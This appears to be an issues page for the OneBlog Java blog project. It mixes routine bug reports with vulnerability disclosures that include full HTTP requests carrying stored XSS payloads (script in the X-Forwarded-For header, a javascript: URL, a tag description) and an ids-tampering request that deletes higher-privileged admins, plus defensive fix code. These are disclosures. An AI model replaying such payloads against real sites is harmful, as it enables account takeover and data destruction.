zhangyd-c / oneblog


:alien: OneBlog, a clean, elegant, feature-rich and responsive Java blog

Home Page: https://docs.zhyd.me

License: GNU General Public License v3.0

Java 45.37% CSS 10.96% JavaScript 12.89% FreeMarker 30.67% Shell 0.05% Dockerfile 0.06%
springboot blog dblog spring-boot bootstrap wangeditor oneblog qiniu spider blog-hunter

oneblog's Introduction

👋 Welcome~~

Contact me

Gitter Wechat G-Mail

Scan the code

oneblog's People

Contributors

chestnutsir, doyutu, harryleexyz, k4n5ha0, leixiaochenshen, liangguifeng, linxuhong, linzhipeng0-0, mxx1111, simonliu2016, wanglei199809, xcxzzx-1, yy12570, zeroorinfinity, zhangyd-c, zmingchun

oneblog's Issues

These are two stored XSS vulnerabilities

There are two XSS vulnerabilities in article reviews.

Vulnerability code:
IpUtil

import javax.servlet.http.HttpServletRequest;

public class IpUtil {
    // Returns the first header value that passes checkIp() (the project's own
    // helper, not shown in the report). Whatever text the client put in
    // x-forwarded-for is returned verbatim, so it is stored and later rendered
    // exactly as sent.
    public static String getRealIp(HttpServletRequest request) {
        String ip = request.getHeader("x-forwarded-for");
        return checkIp(ip) ? ip : (
                checkIp(ip = request.getHeader("Proxy-Client-IP")) ? ip : (
                        checkIp(ip = request.getHeader("WL-Proxy-Client-IP")) ? ip :
                                request.getRemoteAddr()));
    }
}

The IP is taken from x-forwarded-for without filtering. Then an XSS vulnerability occurs when the value is output.

Second place

A crafted url in the POST data to api/comment. There is a problem with the filtering rules.

Vulnerability code:
HtmlUtil

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class HtmlUtil {
    // Reported as-is: strips tag-shaped text and decodes a handful of entities.
    // Both strip passes only match "<...>", so input with no angle brackets at
    // all (for example a javascript: URL) passes through unchanged; this method
    // is not an XSS filter for attribute values such as a link href.
    public static String html2Text(String content) {
        if (StringUtils.isEmpty(content)) { // StringUtils: the project's utility class
            return "";
        }
        String regEx_html = "<[^>]+>";
        content = content.replaceAll(regEx_html, "").replaceAll(" ", "");
        content = content.replaceAll("&quot;", "\"")
                .replaceAll("&nbsp;", "")
                .replaceAll("&amp;", "&")
                .replaceAll("\n", " ")
                .replaceAll("&#39;", "\'")
                .replaceAll("&lt;", "<")
                .replaceAll("&gt;", ">")
                .replaceAll("[ \\f\\t\\v]{2,}", "\t");

        String regEx = "<.+?>";
        Pattern pattern = Pattern.compile(regEx);
        Matcher matcher = pattern.matcher(content);
        content = matcher.replaceAll("");
        return content.trim();
    }
}

Payload

POST /api/comment HTTP/1.1
Host: 127.0.0.1:8443
Content-Length: 181
Accept: /
Origin: http://127.0.0.1:8443
X-Requested-With: XMLHttpRequest
User-Agent: Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
x-forwarded-for:111.111.111.111<script>alert('xss-thiscode01')</script>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

pid=0&content=hello hello&avatar=https%3A%2F%2Fq1.qlogo.cn%2Fg%3Fb%3Dqq%26nk%3D111%26s%3D40&qq=12345&nickname=jack01&email=111%40qq.com&url=javascript:alert('xss-thiscode02');&sid=1


The XSS vulnerability is then triggered.

Enter the background comment management list. The first XSS triggers automatically.

The second XSS triggers when jack01 is clicked.

Asking the author to fix this vulnerability. Thanks.
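As an added example (not OneBlog's own code), a stricter handling of the two inputs this report abuses: the X-Forwarded-For value is accepted only if it parses as an IP literal, and a comment url is kept only if it is an absolute http(s) URL. CommentInputGuard, checkIp and sanitizeUrl are hypothetical names, and templates must still HTML-escape what they render.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.regex.Pattern;
import javax.servlet.http.HttpServletRequest;

// Hypothetical replacement for the project's IpUtil/HtmlUtil handling of the
// two fields in the report: validate shape on input, never trust header text.
public final class CommentInputGuard {

    // Strict IPv4 dotted-quad: each octet 0-255, nothing else allowed.
    private static final Pattern IPV4 = Pattern.compile(
        "^((25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]?\\d)\\.){3}(25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]?\\d)$");
    // Conservative IPv6 shape: hex digits and colons only (no markup, no spaces).
    private static final Pattern IPV6 = Pattern.compile("^[0-9a-fA-F:]{2,39}$");

    /** True only if the value is a syntactically valid IP literal. */
    static boolean checkIp(String ip) {
        if (ip == null) return false;
        String s = ip.trim();
        return IPV4.matcher(s).matches() || (s.indexOf(':') >= 0 && IPV6.matcher(s).matches());
    }

    /** Client IP: first hop of X-Forwarded-For if it is an IP literal, else the socket peer. */
    public static String getRealIp(HttpServletRequest request) {
        String xff = request.getHeader("x-forwarded-for");
        if (xff != null) {
            String first = xff.split(",")[0];   // the header is a comma-separated hop list
            if (checkIp(first)) return first.trim();
        }
        return request.getRemoteAddr();         // not client-editable text
    }

    /** Only absolute http(s) URLs are kept; "javascript:" and other schemes become "". */
    public static String sanitizeUrl(String url) {
        if (url == null || url.isEmpty()) return "";
        try {
            URI u = new URI(url.trim());
            String scheme = u.getScheme() == null ? "" : u.getScheme().toLowerCase(Locale.ROOT);
            if ((scheme.equals("http") || scheme.equals("https")) && u.getHost() != null) {
                return u.toString();
            }
        } catch (URISyntaxException ignored) {
            // malformed input falls through to the empty string
        }
        return "";
    }
}
```

With the report's payload, checkIp rejects "111.111.111.111<script>...</script>" so getRemoteAddr() is stored, and sanitizeUrl returns "" for the javascript: url.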

Blog id error

Once a blog id is greater than 999, the ids of the previous and next article are wrong. For example, 1234 becomes 1,234.
Clicking it causes a backend error:

2019-05-19 22:32:54 [com.zyd.blog.framework.advice.ExceptionHandleController:72] ERROR - url参数异常,请检查参数类型是否匹配!
org.springframework.web.method.annotation.MethodArgumentTypeMismatchException: Failed to convert value of type 'java.lang.String' to required type 'java.lang.Long'; nested exception is java.lang.NumberFormatException: For input string: "6,873"

Caused by: java.lang.NumberFormatException: For input string: "6,873"
at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)

Was blog-admin forgotten in the upload?

Bro, I just saw your blog on spring4all and it looks pretty good.
Your introduction mentions three projects, but there is no blog-admin. Did you forget to upload it?

Hello author, some feedback on a few problems

1. Clicking publish in the admin backend adds and publishes the article, but the rich-text box pulls in text from other articles.
2. When publishing an article, the tags often cannot be clicked, so after editing the article it cannot be published or saved as a draft.

FreeMarker template injection in this project can lead to remote command execution

Hello, this project may be at risk of remote command execution through FreeMarker template injection.

The admin backend has a template management function, and templates can be modified arbitrarily.

The template data in the database was modified successfully.

Then visiting url/sitemap.xml on the front end successfully triggered command execution.

Solution
It is suggested to filter the places where templates are modified.

Hello, sometimes the update operation does not actually succeed

It reports that the update succeeded, but it actually failed, for example:
1. In system settings, first update the site description under basic information, which succeeds; then, without refreshing the page, edit the login retry count under login and submit. It reports success, but nothing was actually updated, although a "modify system configuration" log entry is recorded.
2. In permission management, role management, editing role information reports success but actually fails, although an "edit role configuration" log entry is recorded. The SQL actually executed is
Preparing: UPDATE sys_role SET id = id,update_time = ? WHERE id = ?
Parameters: 2019-08-12 10:52:43.904(Timestamp), null
3. In permission management, resource management: same problem as item 2, editing reports success but actually fails.
4. In the user list: same problem as item 2, editing reports success but actually fails.
5. Article porter: the cover image is not converted to the specified address and still uses the original address.
6. Site management, changelog: same problem as item 2, editing reports success but actually fails.
7. Site management, announcements: same problem as item 2, editing reports success but actually fails.
8. Site management, friendly links: same problem as item 2, editing reports success but actually fails.
9. Site management, template management: same problem as item 2, editing reports success but actually fails.
10. Article management, article list: in the "push to Baidu webmaster platform" function, when a push fails with the message "site error", clicking push again reports failure with the message "please select at least one record", although records are selected; it should report "site error" again.
11. Article management, tag list: same problem as item 2, editing reports success but actually fails.
12. Article management, category list: same problem as item 2, editing reports success but actually fails.
These are the problems I have run into so far; it seems every edit function is broken. Is it a problem with my clone of the code? Hoping for a reply from the author, thanks.
Also, thank you to the author for open-sourcing such a nice project.

Docker deployment: ip:port cannot be accessed

Docker starts successfully,
but the browser cannot access 127.0.0.1:8085.

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
af7da343fe35 nginx "/docker-entrypoint.…" 12 minutes ago Up 12 minutes 0.0.0.0:8080->80/tcp, :::8080->80/tcp nginx
3804c9599f78 justauth/blog-web "java -jar app.jar -…" About an hour ago Up 45 minutes 8085/tcp, 0.0.0.0:8085->8443/tcp, :::8085->8443/tcp blog-web
e675efe0d5b8 justauth/blog-admin "java -jar app.jar -…" About an hour ago Up 45 minutes 0.0.0.0:8086->8085/tcp, :::8086->8085/tcp blog-admin
9c2e59edfd52 justauth/blog-mysql "docker-entrypoint.s…" About an hour ago Up 45 minutes (healthy) 33060/tcp, 0.0.0.0:3307->3306/tcp, :::3307->3306/tcp blog-mysql
eb33133d0abb redis "docker-entrypoint.s…" About an hour ago Up 45 minutes (healthy) 0.0.0.0:6380->6379/tcp, :::6380->6379/tcp blog-redis

Cross Site Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8

Cross Site Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8 via
the add function in the operation tab list in the background: access it, and then inject the

<script>alert("xss")</script> code

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
OneBlog- <=2.2.8

[Affected Component]
POST /tag/add HTTP/1.1
Host: localhost:8085
Content-Length: 70
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8085
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8085/article/tags
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=f0757d8a-afb9-403a-b1f2-5d7c3e3a9d00
Connection: close

id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E

[Attack Type]
Remote

[Impact Code execution]
true
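One hardened FreeMarker Configuration, added here as an example that is not OneBlog's own code, serves both the template-injection report above and this stored XSS in the tag description: HTML output auto-escaping renders stored markup as text, and the ?new built-in that template injection depends on is refused by the class resolver. HardenedFreeMarker is a hypothetical class; the template string and model are constructed.

```java
import freemarker.core.HTMLOutputFormat;
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Map;

// Hypothetical configuration: one Configuration object that escapes every
// ${...} as HTML and blocks class instantiation from inside templates.
public final class HardenedFreeMarker {

    public static Configuration build() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_30);
        cfg.setOutputFormat(HTMLOutputFormat.INSTANCE);   // auto-escaping for all templates
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        cfg.setAPIBuiltinEnabled(false);                  // the default, kept explicit
        return cfg;
    }

    /** Renders an in-memory template (constructed here) against a model. */
    public static String render(String src, Map<String, Object> model) throws Exception {
        Template t = new Template("inline", new StringReader(src), build());
        StringWriter out = new StringWriter();
        t.process(model, out);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample mirroring the tag report: description holds markup.
        String html = render("<li>${name}: ${description}</li>",
                Map.of("name", "Redis", "description", "<script>alert(\"xss\")</script>"));
        // The markup is emitted as escaped text (&lt;script&gt;...), not as an element.
        System.out.println(html);
        // Any ?new() in an editable template is now rejected by the resolver
        // before a class is loaded, so processing fails instead of running code.
        try {
            render("${\"java.lang.StringBuilder\"?new()}", Map.of());
        } catch (Exception e) {
            System.out.println("blocked: " + e.getClass().getSimpleName());
        }
    }
}
```

Admin-editable templates stored in the database should be rendered only through a Configuration like this one; filtering the edit form alone is a weaker control.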

Redis connection failed

2019-10-29 22:06:45 [org.apache.juli.logging.DirectJDKLog:182] ERROR - Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [redis.clients.jedis.exceptions.JedisConnectionException: Could not get a resource from the pool] with root cause
java.net.ConnectException: Connection refused (Connection refused)
at java.net.PlainSocketImpl.socketConnect(Native Method)
at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:350)
at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:206)
at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:188)
at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)

There is an Insecure Permissions vulnerability in OneBlog <= 2.2.8

[Suggested description]
Insecure Permissions vulnerability exists in OneBlog. Low-level administrators can delete higher-level administrators beyond their authority (including administrators with the highest authority).

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
<= 2.2.8

[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close

ids=3 (The ids value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the ids value)

[Attack Type]
Remote

[Vulnerability details]

First, prepare two test accounts with different levels.
Senior administrator: admin
Low-level administrator: root123
Step 2: log in to the system with root123 and enter the user management page.
Step 3: click the delete button to directly delete the administrator user admin.
Delete succeeded!

In addition, you can also use Burp Suite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability, because the system's default secondary rule is that you cannot delete yourself.

The first step is to log in to the background with the root123 account and enter user management.
Step 2: with packet capturing enabled, click the delete button corresponding to user test.
You can delete any user by modifying the value of ids. Here, I modify the value of ids to the id of the currently logged-in user.
Delete succeeded!
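As an added example (not OneBlog's code), the server-side authorization this report shows is missing from /user/remove: every id in the posted list is resolved from the database and checked against the caller before any delete, enforcing both rules the report names (no deleting yourself, no deleting an account of equal or higher level). UserRemovalPolicy, Account, roleRank and the lookup are hypothetical names.

```java
import java.util.List;
import java.util.function.LongFunction;

// Hypothetical policy object; the controller would call authorizeRemoval()
// with the logged-in account before touching the database.
public final class UserRemovalPolicy {

    /** Minimal account view: numeric id plus a rank where higher means more authority. */
    public static final class Account {
        public final long id;
        public final int roleRank;
        public Account(long id, int roleRank) { this.id = id; this.roleRank = roleRank; }
    }

    /** The two rules from the report: never self, and only strictly lower rank. */
    public static boolean canRemove(Account caller, Account target) {
        if (target == null) return false;
        if (target.id == caller.id) return false;          // nobody deletes themselves
        return caller.roleRank > target.roleRank;          // strictly higher rank only
    }

    /**
     * Validates the whole client-supplied ids list. Targets come from the
     * server-side lookup, so an edited ids value cannot reach accounts the
     * caller is not allowed to remove; any violation aborts the request.
     */
    public static void authorizeRemoval(Account caller, List<Long> ids, LongFunction<Account> lookup) {
        if (ids == null || ids.isEmpty()) throw new IllegalArgumentException("no ids given");
        for (Long id : ids) {
            if (id == null) throw new IllegalArgumentException("null id");
            Account target = lookup.apply(id);
            if (target == null) throw new IllegalArgumentException("unknown user " + id);
            if (!canRemove(caller, target)) throw new SecurityException("not allowed to remove user " + id);
        }
    }

    public static void main(String[] args) {
        // Constructed sample mirroring the report: admin outranks root123.
        Account admin = new Account(1, 100), root123 = new Account(3, 10);
        LongFunction<Account> db = id -> id == 1 ? admin : id == 3 ? root123 : null;
        System.out.println(canRemove(root123, admin));     // false: lower rank
        System.out.println(canRemove(root123, root123));   // false: self
        System.out.println(canRemove(admin, root123));     // true
        try {
            authorizeRemoval(root123, List.of(1L), db);    // the report's request, now refused
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```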

Problems encountered when crawling articles; hoping for some ideas

When crawling articles, something goes wrong somewhere and no articles are crawled. The output is as follows, all null:

程序正在初始化...
[ hunter ] null -- null -- null
[ hunter ] [ save ] Succeed! null
[ hunter ] [ sync tags ] Succeed! null
[ hunter ] bye~~

What causes this problem?
